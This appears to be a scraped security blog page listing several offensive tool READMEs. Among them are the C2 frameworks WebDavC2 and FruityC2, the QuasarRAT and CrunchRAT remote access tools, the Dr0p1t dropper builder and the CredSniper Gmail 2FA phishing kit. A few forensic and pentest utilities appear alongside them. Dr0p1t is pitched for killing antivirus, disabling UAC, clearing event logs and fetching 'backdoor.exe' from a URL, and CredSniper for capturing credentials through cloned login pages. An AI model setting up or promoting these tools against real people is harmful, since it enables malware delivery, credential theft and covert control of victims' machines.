Termux ID: Framework -->

    Social Items

Home / Framework

WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actuel C2 server.

Architecture
WebDavC2 is composed of:
  • a controller, written in Python, which acts as the C2 server
  • an agent, written in C#/.Net, running on the target system, delivered to the target system via various initial stagers
  • various flavors of initial stagers (created on the fly when the controller starts) used for the initial compromission of the target system

Features
WebDavC2 main features:
  • Various stager (powershell one liner, batch file, different types of MS-Office macro, JScript file) - this is not limited, you can easily come up with your own stagers, check the templates folder to get an idea
  • Pseudo-interactive shell (with environment persistency)
  • Auto start of the WebClient service, even from an unprivileged user using the 'pushd' trick

Installation & Configuration
Installation is pretty straight forward:
  • Git clone this repository: 
    git clone https://github.com/Arno0x/WebDAVC2 WebDavC2
  • cd into the WebDavC2 folder: 
    cd WebDavC2
  • Give the execution rights to the main script: 
    chmod +x webDavC2.py
To start the controller, simply type 
./webDavC2.py
.

Compiling your own agent
Although it is perfectly OK to use the provided agent.exe, you can very easily compile your own executables of the agent, from the source code provided. You don't need Visual Studio installed.
  • Copy the 
    agent/agent.cs
    file on a Windows machine with the .Net framework installed
  • CD into the source directory
  • Use the .Net command line C# compiler:
    • To get the standard agent executable: 
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:agent.exe *.cs
    • To get the debug version: 
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /define:DEBUG /out:agent_debug.exe *.cs


WebDavC2 - A WebDAV C2 Tool


Quasar adalah alat administrasi jarak jauh yang cepat dan ringan yangdikodekan di C #. Menyediakan stabilitas tinggi dan antarmuka pengguna yang mudah digunakan, Quasar adalah solusi administrasi jarak jauh yang sempurna untuk Anda.

Fitur
  • TCP network stream (IPv4 & IPv6 support)
  • Fast network serialization (NetSerializer)
  • Compressed (QuickLZ) & Encrypted (AES-128) communication
  • Multi-Threaded
  • UPnP Support
  • No-Ip.com Support
  • Visit Website (hidden & visible)
  • Show Messagebox
  • Task Manager
  • File Manager
  • Startup Manager
  • Remote Desktop
  • Remote Webcam
  • Remote Shell
  • Download & Execute
  • Upload & Execute
  • System Information
  • Computer Commands (Restart, Shutdown, Standby)
  • Keylogger (Unicode Support)
  • Reverse Proxy (SOCKS5)
  • Password Recovery (Common Browsers and FTP Clients)
  • Registry Editor

Diperlukan
  • .NET Framework 4.0 Client Profile (Download)
  • Supported Operating Systems (32- and 64-bit)
    • Windows XP SP3
    • Windows Server 2003
    • Windows Vista
    • Windows Server 2008
    • Windows 7
    • Windows Server 2012
    • Windows 8/8.1
    • Windows 10

Compiling
Buka proyek di Visual Studio dan klik build, atau gunakan salah satu file batch yang disertakan dalam direktori root.
Batch file Description
build-debug.bat Build aplikasi menggunakan konfigurasi debug (untuk pengujian)
build-release.bat Build aplikasi menggunakan konfigurasi rilis (untuk penerbitan)

Build Client
Build configuration Description
debug configuration Yang telah ditentukan sebelumnya Settings.cs akan digunakan. Build client tidak bekerja dalam konfigurasi ini. Anda bisa langsung menjalankan klien dengan pengaturan yang ditentukan.
release configuration Gunakan client builder, jika tidak, itu akan crash.


QuasarRAT - Remote Administration Tool for Windows


Have you ever heard about trojan droppers ? In short dropper is type of malware that downloads other malwares and Dr0p1t gives you the chance to create a stealthy dropper that bypass most AVs and have a lot of tricks.

Features
+ Generated executable properties:
  • The executable size is smaller compared to other droppers generated the same way.
  • Download executable on target system and execute it silently..
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Escape disk forensics by making all the files dropper create and dropper also cleans its content before deletion
  • Clear event log after finishing.
+ Framework properties:
+ Modules:
  • Find and kill antivirus before running the malware.
  • The ability to disable UAC.
  • The ability to run your malware as admin.
  • Full spoof by spoofing the file icon and extension to any thing you want.
  • ZIP files support so now you can compress your executable to zip file before uploading.
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
+Persistence modules:
  • Adding executable after downloading it to startup.
  • Adding executable after downloading it to task scheduler ( UAC not matters ).
  • Adding your file to powershell user profile so your file will be downloaded and ran every time powershell.exe run if it doesn't exist.

Screenshots

On Windows


On Linux (Kali linux)



On OSX
Still not fully tested! Need some contributors and testers

Help menu
Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help      show this help message and exit
-s              Add your malware to startup (Persistence)
-t              Add your malware to task scheduler (Persistence)
-a              Add your link to powershell user profile (Persistence)
-k              Kill antivirus process before running your malware.
-b              Run this batch script before running your malware. Check scripts folder
-p              Run this powershell script before running your malware. Check scripts folder
-v              Run this vbs script before running your malware. Check scripts folder
--runas         Bypass UAC and run your malware as admin
--spoof         Spoof the final file to an extension you choose.
--zip           Tell Dr0p1t that the malware in the link is compressed as zip
--upx           Use UPX to compress the final file.
--nouac         Try to disable UAC on victim device
-i              Use icon to the final file. Check icons folder.
--noclearevent  Tell the framework to not clear the event logs on target machine after finish.
--nocompile     Tell the framework to not compile the final file.
--only32        Download your malware for 32 bit devices only
--only64        Download your malware for 64 bit devices only
-q              Stay quite ( no banner )
-u              Check for updates
-nd             Display less output information

Examples
./Dr0p1t.py Malware_Url [Options]
./Dr0p1t.py https://test.com/backdoor.exe -s -t -a -k --runas --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 --runas
./Dr0p1t.py https://test.com/backdoor.zip -t -k --nouac -i flash.ico --spoof pdf --zip

Prerequisites
  • Python 2 or Python 3.
The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

Needed dependencies for Linux
  • apt
  • Others will be installed from install.sh file
Note : You must have root access

Needed dependencies for windows
  • pip
  • Modules in windows_requirements.txt

Installation
There's a list here for all official videos for installing and using Dr0p1t Playlist
  • On Linux
git clone https://github.com/D4Vinci/Dr0p1t-Framework.git
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
sudo chmod +x install.sh
./install.sh
python Dr0p1t.py
  • On Windows (After downloading ZIP and upzip it)
cd Dr0p1t-Framework-master
python -m pip install -r windows_requirements.txt
python Dr0p1t.py
Note : in python 2.7 you don't have pip so install it first from get-pip.py script [Google it]

Tested on:
  • Kali Linux Rolling
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Work with Dr0p1t-Server
Note : Server is still in beta version and it have a lot of features to add and also a better design [ Need a designer to contribute :D ]

Prerequisites
  • Stable internet connection.
  • Port 5000 not used and firewall configured to not block connection from it

Installation & run server
On Linux and Windows it's the same after installing Dr0p1t by doing the steps mentioned above, install modules in server_requirements.txt by using pip like :
python -m pip install -r server_requirements.txt
Now let's run our server script :
python Dr0p1t_Server.py
After running the server script, it will start to listen to all the connection coming to port 5000 using flask.
Now to use the server from your device open in browser either 127.0.0.1:5000 or [Your IP]:5000.
To open it from other devices in LAN open [Your Local IP]:5000 and for other devices in WAN open [Your Global IP]:5000 but make sure first that you configured you router to forward port 5000 connection to you.
After opening the serve page you will see a simple website with a simple design asking you for data needed See server screenshots
Then submit the data then it will be verified through some processes then the exe file will be generated and you will be redirected to page telling you the scam link.
After entering the link you will see a scam to download the dropper which it by default Adobe flash download page. To replace the scam with yours replace the file "Scam.html" content with yours but remember the variables ( Don't remove it ).

Server screenshots






Dr0p1t-Framework 1.3.2.1 - A Framework That Creates An Advanced FUD Dropper With Some Tricks


IP-Biter is an open source, easy to deploy, tracking framework that generate high configurables and uniques tracking images and links to embed in e-mails, sites or chat systems and visualize, in an hacker-friendly dashboard, high detailed reports of the tracked users who visualize the image or open the links.

Features
  • Very high configurable tracking image generation
  • Tracking links generation
  • Tracking hided and not recognizable from the target point of view
  • Integrated Dashboard
  • Self-tracking prevention
  • Possibility to stop and start the tracking at any time
  • Possibility to hide the Dashboard and protect its access with a password
  • Live tracking reports from the Dashboard
  • Tracking reports live delivered to a configurable mail address
  • Different IP analysis services
  • User-Agent analysis service
  • Integrate URL shortening service
  • AllInOne PHP file
  • No need for a Database
  • Open Source
...and many many more!
Give it a try!

Getting Started

Access the Dashboard
  1. Access the dashboard through ipb.php?op=$dashboardPage (or through ipb.php if $dashboardPage=='')
    • If $dashboardPageSecret!='' then a login page will appear asking for the $dashboardPageSecret value

Create a new configuration
  1. When the dashboard is opened without parameters, a new configuration is created
    • Another empty new configuration can be generate clicking the "New" button
  2. Configure the tracking image and the advanced setting if needed
    • It is possible to left the original image url empty. In this case an empty image will be used.
  3. Add tracking links if needed
    • It is possible to left the original link empty. In this case the link will generate a 404 page.
  4. Save the configuration
  5. Distribute the generated image or the links to start the tracking
    • You can click the copy button and paste in a html rich email editor like gmail
    • NOTE: If you try to open the generated image or links but have in the same browser the dashboard page opened and loaded, your request will not be tracked (self-tracking prevention feature)

Load an existing configuration
  1. When the dashboard is opened with the parameter "uuid", the associated configuration is loaded
    • Another configuration can be loaded pasting the "Track UUID" in the dashboard relative field and clicking the "Load" button
  2. The reports will be automatically visualized in the "Tracking Reports" section of the dashboard

Security Notes
  • Change the folders name and the dashboard page in the configuration section in order to improve the security
  • Add the following lines to the .htaccess file in order to deny the access to the "configs" and "reports" folders:
DirectoryIndex ipb.php
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteRule ^(configs/|reports/) - [F]
</IfModule>

Live DEMO
Have a look at the DEMO (notifications limited at 50 mail/day and 1h/day downtime expected)


IP-Biter - The Hacker-friendly E-Mail Tracking Framework


Easily launch a new phishing site fully presented with SSL and capture credentials along with 2FA tokens using CredSniper. The API provides secure access to the currently captured credentials which can be consumed by other applications using a randomly generated API token.

Benefits
  • Fully supported SSL via Let's Encrypt
  • Exact login form clones for realistic phishing
  • Any number of intermediate pages
    • (i.e. Gmail login, password and two-factor pages then a redirect)
  • Supports phishing 2FA tokens
  • API for integrating credentials into other applications
  • Easy to personalize using a templating framework

Basic Usage
usage: credsniper.py [-h] --module MODULE [--twofactor] [--port PORT] [--ssl] [--verbose] --final FINAL --hostname HOSTNAME
optional arguments:
  -h, --help           show this help message and exit
  --module MODULE      phishing module name - for example, "gmail"
  --twofactor          enable two-factor phishing
  --port PORT          listening port (default: 80/443)
  --ssl                use SSL via Let's Encrypt
  --verbose            enable verbose output
  --final FINAL        final url the user is redirected to after phishing is done
  --hostname HOSTNAME  hostname for SSL

Credentials
.cache : Temporarily store username/password when phishing 2FA
.sniped : Flat-file storage for captured credentials and other information

API End-point
  • View Credentials (GET) https://<phish site>/creds/view?api_token=<api token>
  • Mark Credential as Seen (GET) https://<phish site>/creds/seen/<cred_id>?api_token=<api token>
  • Update Configuration (POST) https://<phish site>/config
 {
    'enable_2fa': true,
    'module': 'gmail',
    'api_token': 'some-random-string'
 }

Modules
All modules can be loaded by passing the --module <name> command to CredSniper. These are loaded from a directory inside /modules. CredSniper is built using Python Flask and all the module HTML templates are rendered using Jinja2.
  • Gmail: The latest Gmail login cloned and customized to trigger/phish all forms of 2FA
    • modules/gmail/gmail.py: Main module loaded w/ --module gmail
    • modules/gmail/templates/error.html: Error page for 404's
    • modules/gmail/templates/login.html: Gmail Login Page
    • modules/gmail/templates/password.html: Gmail Password Page
    • modules/gmail/templates/authenticator.html: Google Authenticator 2FA page
    • modules/gmail/templates/sms.html: SMS 2FA page
    • modules/gmail/templates/touchscreen.html: Phone Prompt 2FA page

Installation

Ubuntu 16.04
You can install and run automatically with the following command:
$ git clone https://github.com/ustayready/CredSniper
$ cd CredSniper
~/CredSniper$ ./install.sh
Then, to run manually use the following commands:
~/$ cd CredSniper
~/CredSniper$ source bin/activate
(CredSniper) ~/CredSniper$ python credsniper.py --help
Note that Python 3 is required.

Screenshots

Gmail Module





CredSniper - Phishing Framework which supports SSL and capture credentials with 2FA tokens


Evil-Droid is a framework that create & generate & embed apk payload to penetrate android platforms.

Screenshot:


Dependencies :
1 - metasploit-framework
2 - xterm
3 - Zenity
4 - Aapt
5 - Apktool
6 - Zipalign

Download/Config/Usage:
1 - Download the tool from github 
git clone https://github.com/M4sc3r4n0/Evil-Droid.git
2 - Set script execution permission 
cd Evil-Droid
chmod +x evil-droid
3- Run Evil-Droid Framework : 
./evil-droid
see options bellow

Video tutorial:


Evil-Droid - Framework to Create, Generate & Embed APK Payloads


CrunchRAT currently supports the following features:
  • File upload
  • File download
  • Command execution
It is currently single-threaded (only one task at a time), but multi-threading (or multi-tasking) is currently in the works. Additional features will be included at a later date.

Server
The server-side of the RAT uses PHP and MySQL. The server-side of the RAT has been tested and works on the following:
  • Ubuntu 15.10 (Desktop or Server edition)
  • Ubuntu 16.04 (Desktop or Server edition)
Once the latest RAT code has been downloaded, there will be three directories:
  • Client - Contains implant code (ignore for the this section)
  • Server - Contains server code
  • Setup - Contains setup files

Dependencies Setup
  1. Within the Setup directory, there are two dependencies setup shell scripts. If you are using Ubuntu 15.10 run sh 15_10_dependencies.sh, and if you're using Ubuntu 16.04 run sh 16_04_dependencies.sh. Note: This needs to be run as root. Failure to run with root privileges will result in an error.
  2. When asked for a new MySQL root password, please choose one that is complex. This information is needed at a later step.

HTTPS Setup
  1. CrunchRAT uses a self-signed certificate to securely communicate between the server and implant. Run the https_setup.sh shell script with the Setup directory to automate the HTTPS setup. Note: This needs to be run as root. Failure to run with root privileges will result in an error. When asked to fill out the certificate information (Country Name, etc), please fill out all information. Snort rules already exist to alert on the dummy OpenSSL certificates. Don't be that guy that gets flagged by not filling out this information.

Database Setup
  1. Run the database_setup.sh shell script within the Setup directory to setup the MySQL database.
  2. CrunchRAT creates a default RAT account with the admin:changeme credentials. Please log into the web end of the RAT and change the default password. Once logged into the web end of the RAT, go to Account Management--> Change Password to successfully change the default password to something more complex. Additional RAT users can be provisioned using Account Management --> Add Users.

Miscellaneous Setup
  1. Copy all files from the Server directory to the webroot.
  2. You will want to create a downloads directory as well. Note: It is absolutely critical that you don't put this folder in the webroot. I typically create this directory in the /home/<USERNAME> directory. You will want to make sure that www-data can access this directory with the following command sudo chown www-data:www-data downloads. This directory will store all of the files downloaded from the infected system(s).
  3. In the webroot, open the config/config.php file. This is the main RAT configuration file. Make sure that you update all of the variables (downloadsPath, dbUser, dbPass, etc) to match your environment.

Client
CrunchRAT is written in C# for simplicity. The C# binary does not have a persistence mechanism in place, but plans to write a C++ stager are currently in the works.
Targeted Framework: .NET Framework 3.5 (enabled by default on Windows 7 systems)
  1. Create a new console project in Visual Studio
  2. Copy implant.cs code from Client directory and add it to the project.
  3. Change Output Type to Windows Application (this will hide the command window) (Project --> Properties --> Output Type).
  4. Make sure Target Framework is .NET Framework 3.5.
  5. In the actual code, there will be a variable called c2 - Change this variable to the IP address or domain name of the C2 server
  6. Compile and your implant executable is ready to run.


CrunchRAT - HTTPS-based Remote Administration Tool (RAT)


kernelpop is a framework for performing automated kernel exploit enumeration on Linux, Mac, and Windows hosts.

Requirements
python3

Currently supported CVE's:
*CVE-2017-1000367
*CVE-2017-1000112
*CVE-2017-7308
*CVE-2017-6074
*CVE-2017-5123
*CVE-2016-5195
*CVE-2016-2384
*CVE-2016-0728
*CVE-2015-7547
*CVE-2015-1328
*CVE-2014-4699
*CVE-2014-4014
*CVE-2014-3153
*CVE-2014-0196
*CVE-2009-1185

Run modes

default mode
The default mode runs with the command python3 kernelpop.py. This processes information about the host kernel and compares it to the known kernel exploits available to the program. It then outputs a list of potentially useful vulnerabilities and attached exploits.


brute-enumeration mode
The brute-enumeration mode performs the same checks, but then goes beyond and checks the computer for exploit prerequisites to see if the operating system is set up in the required vulnerable state for successful exploitation.



input mode
The input mode allows you to perform enumeration with just the output of a uname -a command, which makes it useful as a host-side enumeration tool.



One feature currently only partially implemented is brute-exploit mode. This is set to prepare, compile, and run exploits in order to confirm an exploitable kernel. However, as of now it would only run on the box the program is executed on. Given that this is a fairly large project to bring on to someone else's computer, and makes considerable noise when compiling and checking exploit attempts, it would be poor OPSEC to use in an actual engagement. At some point in the future, I would like to integrate it into my other project pysploit for enumeration and the reckless, noisy, exploity brute-exploit mode.

Exploit sources
https://github.com/SecWiki/linux-kernel-exploits
https://www.exploit-db.com/local/
https://github.com/SecWiki/windows-kernel-exploits


Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework


A Simple tool for installing pentest tools and forensic tools on Debian / Ubuntu Based OS
Tested on Linux Mint And Kali Linux

I Want To Get This How To Do ??
  • Change Your Privileges Terminal to Root Mode
your@terminal:~$ sudo su
  • And Then Clone This
your@terminal:~# git clone https://github.com/Yukinoshita47/Pentest-Tools-Auto-Installer.git
  • Get Inside Dir
your@terminal:~# cd Pentest-Tools-Auto-Installer
  • Give Chmod Access Level 777
your@terminal:~# chmod 777 ptai.sh
  • Run It
your@terminal:~# ./ptai.sh
for install the tools just press number of tools what you want to install it and then press enter and if you want to exit just press 1337 and then press enter or simple way to exit just press CTRL C

Video Demo
Demo Video Pentest Tools Auto Installer https://www.youtube.com/watch?v=eKrgr1gm3z8
Make Your Android For Pentesting With Gnuroot Debian And Pentest Tools Auto Installer https://youtu.be/Wdx1LSFLG5Y

List of tools
  1. Nmap[Network Scanner]
  2. Zenmap [Nmap Gui version]
  3. Wireshark [Network Sniffer]
  4. W3af [Web Vulnerability Scanner]
  5. Nikto [Web Vulnerability Scanner]
  6. Whatweb [Web Vulnerability Scanner]
  7. John [Password Cracker]
  8. PDF-Crack [PDF Password Cracker]
  9. FCrackZip [ZIP Password Cracker]
  10. Ophcrack [Password Cracker]
  11. Volatility [Digital Forensic]
  12. Digital Forensic Framework [Digital Forensic]
  13. GHex [Digital Forensic]
  14. Aircrack-Ng [Wifi Audit]
  15. Ettercap [Network Audit]
  16. Yersinia [Network Audit]
  17. Packet Sniffer / Spoofing [Network Audit]
  18. Wafw00f [Web Application Firewall Audit]
  19. SSLyze [SSL Audit]
  20. Droopescan [Wordpress, Joomla, And Other CMS Auditing]
  21. SQLMap [Automate SQL Injection Audit]
  22. SSLScan [SSL Audit]
  23. Hydra [Password Cracker]
  24. Dmitry [Intelligence Gathering]
  25. HAVP [HTTP Anti Virus Proxy]
  26. krdc [Windows Remote Desktop Connection client]
  27. Medusa [Password Cracker]

Screenshot







Pentest-Tools-Auto-Installer - A Simple Tool For Installing Pentest Tools And Forensic Tools On Debian / Ubuntu Based OS


The Rekall Framework is a completely open collection of tools, implemented in Python under the Apache and GNU General Public License, for the extraction and analysis of digital artifacts computer systems.
The Rekall distribution is available from: http://www.rekall-forensic.com/
Rekall should run on any platform that supports Python
Rekall supports investigations of the following 32bit and 64bit memory images:
  • Microsoft Windows XP Service Pack 2 and 3
  • Microsoft Windows 7 Service Pack 0 and 1
  • Microsoft Windows 8 and 8.1
  • Microsoft Windows 10
  • Linux Kernels 2.6.24 to 4.4.
  • OSX 10.7-10.12.x.
Rekall also provides a complete memory sample acquisition capability for all major operating systems (see the tools directory).

Quick start
Rekall is available as a python package installable via the pip package manager. To install it, first create a virtal env, switch to it and then install rekall:
$ virtualenv  /tmp/MyEnv
New python executable in /tmp/MyEnv/bin/python
Installing setuptools, pip...done.
$ source /tmp/MyEnv/bin/activate
$ pip install --upgrade setuptools pip wheel
$ pip install rekall-agent rekall
For windows, Rekall is also available as a self contained installer package. Please check the download page for the most appropriate installer to use Rekall-Forensic.com
To install from this git repository you will need to use pip --editable and follow the correct order of installation (otherwise pip will pull released dependencies which might be older):
$ virtualenv  /tmp/MyEnv
New python executable in /tmp/MyEnv/bin/python
Installing setuptools, pip...done.
$ source /tmp/MyEnv/bin/activate
$ pip install --upgrade setuptools pip wheel
$ git clone https://github.com/google/rekall.git rekall
$ pip install --editable rekall/rekall-lib
$ pip install --editable rekall/rekall-core
$ pip install --editable rekall/rekall-agent
$ pip install --editable rekall
On Windows you will need to install the Microsoft Visual C compilers for python (for more info see this blog post http://rekall-forensic.blogspot.ch/2015/09/installing-rekall-on-windows.html)

History
In December 2011, a new branch within the Volatility project was created to explore how to make the code base more modular, improve performance, and increase usability. The modularity allowed Volatility to be used in GRR, making memory analysis a core part of a strategy to enable remote live forensics. As a result, both GRR and Volatility would be able to use each other's strengths.
Over time this branch has become known as the "scudette" branch or the "Technology Preview" branch. It was always a goal to try to get these changes into the main Volatility code base. But, after two years of ongoing development, the "Technology Preview" was never accepted into the Volatility trunk version.
Since it seemed unlikely these changes would be incorporated in the future, it made sense to develop the Technology Preview branch as a separate project. On December 13, 2013, the former branch was forked to create a new stand-alone project named "Rekall.” This new project incorporates changes made to streamline the codebase so that Rekall can be used as a library. Methods for memory acquisition and other outside contributions have also been included that were not in the Volatility codebase.
Rekall strives to advance the state of the art in memory analysis, implementing the best algorithms currently available and a complete memory acquisition and analysis solution for at least Windows, OSX and Linux.

More documentation
Further documentation is available at http://www.rekall-forensic.com/


Rekall v1.7 - Forensic and Incident Response Framework


Exploit Pack has been designed by an experienced team of software developers and exploit writers to automate processes so penetration testers can focus on what's really important. The threat. This blend of software engineers and subject matter experts provides an unique advantage by combining technical know-how with true insight into the problem set, resulting in more efficient solutions for cyber security surveillance.

Get an ISO/VM with Exploit Pack

Get an ISO or a VM with Exploit Pack already installed: Exploit Pack comes pre-installed in several Linux distributions, but our all time favorite is BlackArch, get it here: https://blackarch.org/downloads.html

Get/Update using GIT

After you install git in your desired platform, windows, osx, linux then you can simply run the following commands: To get Exploit Pack:
$ git clone https://github.com/juansacco/exploitpack.git
To update to the latest release: Navigate into Exploit Pack folder and run this command
$ git pull

Documentation

Please check our javadocs included under the folder with that name, also check our online guide, pdfs and the information all over the internet about this tool, feel free to make comments, integrate with our community and have fun!

Known issues:

Using Exploit Pack could produce addiction Prolonged periods of time using this tool could produce network mayhem or even dead In case of intoxication ( using Exploit Pack under Windows ) please call your doctor immediately.

 Installation notes:

 Windows:

 Download and install Java 8 from Oracle:
Depending on your platform you have to choose between Windows Java SE Java 8 for 32 bits or Java 8 for 64 bits After you have installed Java 8 in your system, get Exploit Pack from the official site, uncompress and double click ExplotPack.jar, if that does not work, try from a console using this command: "java -jar ExploitPack.jar"

 Linux:
Under any Linux distribution that supports DEB packages like Ubuntu, Debian, Kali, etc. you can run the following commands to install Java 8 from an official repository Copy and paste the following in a terminal window:
echo "deb http://ppa.launchpad.net/webupd8team/java/ubuntu trusty main" >> /etc/apt/sources.list
echo "deb-src http://ppa.launchpad.net/webupd8team/java/ubuntu precise main" >> /etc/apt/sources.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys EEA14886
sudo apt-get update
sudo apt-get install oracle-java8-installer

Then, get Exploit Pack trough GIT or download it from the official website. After that run it from a terminal using the following command: "java -jar ExploitPack.jar"

 OSX:

Download and install Java 8 for OSX 32/64 bits from Oracle: OSX Java 8 32/64 bits After you have Java 8 installed in your Mac, download Exploit Pack, uncompress and double click ExploitPack.jar to run it or from a console: "java -jar ExploitPack.jar"

BUILD OUTPUT DESCRIPTION

When you build an Java application project that has a main class, the IDE automatically copies all of the JAR files on the projects classpath to your projects dist/lib folder. The IDE also adds each of the JAR files to the Class-Path element in the application JAR files manifest file (MANIFEST.MF).

To run the project from the command line, go to the dist folder and type the following:
java -jar "ExploitPack.jar"
To distribute this project, zip up the dist folder (including the lib folder) and distribute the ZIP file.

Notes:

  • If two JAR files on the project classpath have the same name, only the first JAR file is copied to the lib folder.
  • Only JAR files are copied to the lib folder.
  • If the classpath contains other types of files or folders, these files (folders) are not copied.
  • If a library on the projects classpath also has a Class-Path element specified in the manifest,the content of the Class-Path element has to be on the projects runtime path.
  • To set a main class in a standard Java project, right-click the project node in the Projects window and choose Properties. Then click Run and enter the class name in the Main Class field. Alternatively, you can manually type the class name in the manifest Main-Class element.

Exploit Pack - Penetration Testing Framework


Intelligence and Reconnaissance Package/Bundle installer.
IntRec-Pack is a Bash script designed to download, install and deploy several quality OSINT, Recon and Threat Intelligence tools. Due to the fact it manages the installation of the various dependencies related to these programs as well it aims to be a comprehensive assistant in setting up your intelligence gathering environment. Below is an overview of the tools and utilities it will help you set up.

+-----------------------+-------------------------------------------+
| Tool                  | Utility type and feature summary          |
+-----------------------+-------------------------------------------+
|1. QuickScan         | Port Scanner/WHOIS/Domain Resolver        | 
|2. DNSRecon         | Advanced DNS Enumeration & Domain Utility |
|3. Sublist3r           | OSINT Based Subdomain Enumeration         |
|4. TekDefense-Automator| OSINT Based IP, URL and Hash Analyzer     |
|5. TheHarvester        | eMail, vHost, Domain and PII Enumeration  |
|6. IOC-Parser          | Threat Intel, parses IOC data from reports|
|7. PyParser-CVE        | Multi Source Exploit Parser/CVE Lookup    |
|8. Mimir               | HoneyDB CLI/Threat Intelligence Utility   |
|9. Harbinger           | Cymon.io, Virus Total, Threat Feed Parser |
|10.Spiderfoot          | Advanced OSINT/Reconnaissance Framework   |
+-----------------------+-------------------------------------------+
Furthermore I have included functionality within the Bash script that allows the user to easily pull up two web based resources. Namely OSINT-Framework and HoneyDB. The former serves as a curated list of open source intelligence tools, websites and related materials for use as a reference guide. While the latter is an OSINT aggregative threat intelligence pool that collects and organizes data provided by HoneyPy honeypots. My Command Line Interface for which is included in the selection of tools available for download with IntRec-Pack as well.

Usage
Clone the tool from the repo and make it executable like so.
git clone https://github.com/NullArray/IntRec-Pack.git
cd IntRec-Pack
chmod +x intrec.sh
After which it can be started from the command line with sudo ./intrec.sh. Upon doing so you will be presented with a menu the options for which are as follows:
1) Help                  4) Specify Install Location
2) List and Install      5) Online Resources
3) Install All           6) Quit
The help option displays further usage information and general details about the tool. List and Install will list all the tools available for download/installation and lets you select the ones you would like. Upon doing so the tool plus it's dependencies will be installed in the current working directory. Unless the Specify Install Location option has been used to provide a path to a custom location. Install All will download and install all the tools available with this script and Online Resources will open the web applications previously mentioned.

Update
The script has been updated to version 1.0.1.

Changelog
Each installation operation now has its own function in order to make the script modular. This will also allow for the easy addition of operations that would install other/more tools in the future.
Additional checks have been added to the script in order to look for the presence of utilities such as wget, git and pip. This is important because some distros such as Debian and Devuan do not come with some of these utilities installed by default. Should the script find any of these utilities are missing it will attempt to automatically resolve the issue. Making the script effective and compatible with most Debian based distros.
From now on IntRec-Pack will check to see if it has been started with super user privilege. Since there are a lot of sudo commands in the script this will prevent the user from running into trouble halfway through the execution.


IntRec-Pack - Intelligence and Reconnaissance Package/Bundle installer


Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.
A payload in Wfuzz is a source of data.
This simple concept allows any input to be injected in any field of an HTTP request, allowing to perform complex web security attacks in different web application components such as: parameters, authentication, forms, directories/files, headers, etc.
Wfuzz is more than a web content scanner:
  • Wfuzz could help you to secure your web applications by finding and exploiting web application vulnerabilities. Wfuzz’s web application vulnerability scanner is supported by plugins.
  • Wfuzz is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Building plugins is simple and takes little more than a few minutes.
  • Wfuzz exposes a simple language interface to the previous HTTP requests/responses performed using Wfuzz or other tools, such as Burp. This allows you to perform manual and semi-automatic tests with full context and understanding of your actions, without relying on a web application scanner underlying implementation.

It was created to facilitate the task in web applications assessments, it's a tool by pentesters for pentesters ;)

Installation
To install WFuzz, simply use pip:
pip install wfuzz

Documentation
Documentation is available at http://wfuzz.readthedocs.io


Wfuzz - Web Application Fuzzer


This is the initial release for FruityC2 (alpha version). Can be installed on any linux system, but the installation scripts are made for Debian based systems. There are a lot of functionalities that will be include in future releases, and probably a lot of code will be changed, but this version is enough to show FruityC2.

FruityC2 is a post-exploitation (and open source) framework based on the deployment of agents on compromised machines. Agents are managed from a web interface under the control of an operator.

It works as a command-and-control model and is language and system agnostic. New agents are being developed to expand the capabilities and options for FruityC2.

A web client is used to interact with the FruityC2 API in a client/server mode. The client is a single web page divided into 5 sections: Interact, Listener, Payload, Delivery, Config. These options provide full control and access to the functions included in FruityC2 to create, deliver and interact with a functioning C2 capability.

During the development of the initial alpha version, I divided the efforts between the client and the server, but mainly on the client.
The next steps are to improve the Stager and Agent, add more functionalities and commands, and I will start developing new stagers and agents for other OS systems.
Note: The current Stager and Agent can be only executed on Windows (powershell), but this will be extended in future releases to other systems and file types.

Install

Method 1: Standard installer (Server)
script: install.sh
Note: you need to download the master.zip file or to clone the repository (FruityC2).

Method 2: Standalone installer (Server and Client)
script: install-standalone.sh
  • You need Debian (or based) installed (or a Live CD version) to use this script.
  • Download installer-standalone.sh from https://github.com/xtr4nge/FruityC2/
  • run install-standalone.sh (It will downlaod and install all the dependencies, FruityC2 and FruityC2-Client)
  • Done.

FruityC2 Server
Edit the file config/settings.conf and add the IP (from where FruityC2-Client will be used) in section:
[souce][[control]
allow = '127.0.0.1', '10.0.0.1', 'fruityc2-client-ip'

Then run
./FruityC2.py
Note: To use FruityC2 you need FruityC2-Client. You don't need a webserver to use FruityC2-Client, just open index.html.

FruityC2-Client Wiki
https://github.com/xtr4nge/FruityC2-Client/wiki

Extra Scripts

download-modules-extra.sh
This script can be used to download extra modules from the projects: Empire, PowerSploit, PowerShell-AD-Recon and Nishang

reset.sh
This script can be used to backup the data, logs and config files to then reset the server data.


FruityC2 - Post-Exploitation Tool to Manage Compromised Machines from a Web Interface


Dradis is an open-source collaboration framework, tailored to InfoSec teams.

Goals
  • Share the information effectively.
  • Easy to use, easy to be adopted. Otherwise it would present little benefit over other systems.
  • Flexible: with a powerful and simple extensions interface.
  • Small and portable. You should be able to use it while on site (no outside connectivity). It should be OS independent (no two testers use the same OS).

Some of the features:

Editions
There are two editions of Dradis Framework:
  • Dradis Framework Community Edition (CE): open-source and available freely under the GPLv2 license.
  • Dradis Framework Professional Edition (Pro): includes extra features that are more useful for organizations dealing with bigger teams and multiple projects at a time. To use Pro and get official support please become a subscriber.

Getting started: Community Edition

Git release (recommended)
$ git clone https://github.com/dradis/dradis-ce.git
$ cd dradis-ce/
